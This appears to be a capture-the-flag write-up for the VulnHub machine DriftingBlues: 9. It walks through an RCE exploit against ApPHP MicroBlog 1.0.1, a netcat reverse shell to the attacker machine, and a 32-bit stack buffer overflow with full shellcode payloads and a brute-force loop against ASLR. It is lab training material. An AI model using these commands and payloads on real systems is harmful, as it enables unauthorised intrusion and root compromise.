DriftingBlues: 9 BOOT2ROOT CTF VULNHUB WRITEUP

Welcome back to another WriteUp! In this one, I’ll walk you through the step-by-step process I used to solve the Final Machine of DriftingBlues from VulnHub!!! Let's start!!

We'll use Nmap to scan for open ports and identify possible endpoints.

nmap -A -p- -T5 192.168.172.235

Now let's visit the webpage.

Just a classic DriftingBlues Static Page

If you will analyze the Nmap scan carefully, you can see that the webpage is using ApPHP MicroBlog .

ApPHP MicroBlog is a lightweight, PHP-based blogging platform designed for quick setup and simple content management, often used in older web projects or educational setups. While it offers basic features like post creation, categories, and multi-author support, it has become outdated and is rarely used today due to multiple security flaws. Known vulnerabilities in versions like 1.0.1 include Remote Code Execution (RCE), Local File Inclusion (LFI), and unauthenticated file uploads, making it highly exploitable.

Let's check the source code to determine its version.

1.0.1??

Now let’s run searchsploit to directly check if there’s a known exploit available for ApPHP MicroBlog. (Sure it has, xD)

searchsploit microblog

Instant RCE for sure, now let's use 33070 .

searchsploit -m php/webapps/33070.py

The exploit is written in Python2, the legacy version of Python.

python2 33070.py http://192.168.172.235

It works, with a Database Credentials in it.

To establish a stable shell, we’ll set up a Netcat listener on our attacker machine and have the target system connect back to it.

Attacker machine:

nc -lnvp 1234

Target machine:

nc 192.168.172.246 1234 -e /bin/bash

And...

Now that we’ve gained shell access, let’s upgrade it to an interactive shell using pty and set the TERM environment variable to xterm.

python -c 'import pty;pty.spawn("/bin/bash")'

Then

export TERM=xterm

While exploring the home directory, I discovered a user named clapton. If you recall from the earlier dumped credentials during the exploit, clapton's password was included. So from here, we can switch directly to the clapton user.

su clapton

We're now clapton!!!
User Flag!!

Next to the user flag, there are also two additional files.

note.txt and input

Let's check the note.txt

Alright, it looks like a Buffer Overflow is the main vulnerability here. The input file is likely a compiled binary.

It is, and it's 32-bit. Now let's execute it.

Now let's fill it up with lots of 'A'.

It results in a Segmentation Fault, confirming the presence of a Buffer Overflow vulnerability.

To dig deeper into the analysis, I transferred the binary over to my attacker machine.

make sure that the ASLR is disabled before you take any action. Otherwise, your return addresses will be unpredictable, and your exploit will likely fail.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Let’s now use GDB to examine the binary in more detail.

gdb -n ./input

I input a series of 'A's once more to check if we can take control of the EIP. If the program returns an address like 0x41414141, it's likely a stack-based buffer overflow.

And it is!

Let’s use Metasploit’s pattern_create to generate our input.

./pattern_create.rb -l 400

Now let's get the offset of 0x41376641 .

Our offset is 171 .

Let's check the value of the ESP register. Because the system uses little endian format, the bytes will appear in reverse order.

x/s $esp

Our EIP is 0xffffd260 in reverse.

0xffffd260 → 0x60 0xd2 0xff 0xff → \x60\xd2\xff\xff

Now that we have everything we need, we can proceed to craft our payload.

PAYLOAD = OFFSET_VALUE + EIP_VALUE + NOPS + BASH_SHELL_CODE

For the shell code, I used the shellcode in this exploit I've found in exploit-db.

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80

This is our final payload:

python3 -c 'print("A" * 171 + "\x60\xd2\xff\xff" + "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")'

Now let's execute it in our target machine.

Note: GDB is available on the target machine, be sure to repeat the entire process there to accurately obtain the EIP value.

Since we'll be executing it on a different machine where ASLR is enabled by default, we'll run the payload in a loop to increase the chances of success. 

for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\x00\xbf\xe8\xbf" + "\x90" * 1000 + "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80")')); done

The first attempt might failed, just continue executing it.

After a long time....

We're root!!!

Root Flag!!

We've successfully pwned DriftingBlues: 9 and completed the DriftingBlues Series!!!

The DriftingBlues series has been an incredibly enjoyable and insightful experience — starting from cronjob privilege escalation techniques to diving deep into buffer overflow exploitation. Each challenge offered a valuable learning opportunity, showcasing different aspects of Linux privilege escalation, exploitation techniques, and system misconfigurations. It’s a well-rounded series that not only tests your technical skills but also sharpens your mindset as a security researcher or CTF player. I highly recommend it to anyone aiming to strengthen their foothold in offensive security.

PreviousDriftingBlues: 7 BOOT2ROOT CTF VULNHUB WRITEUPNextBinary Exploitation

Last updated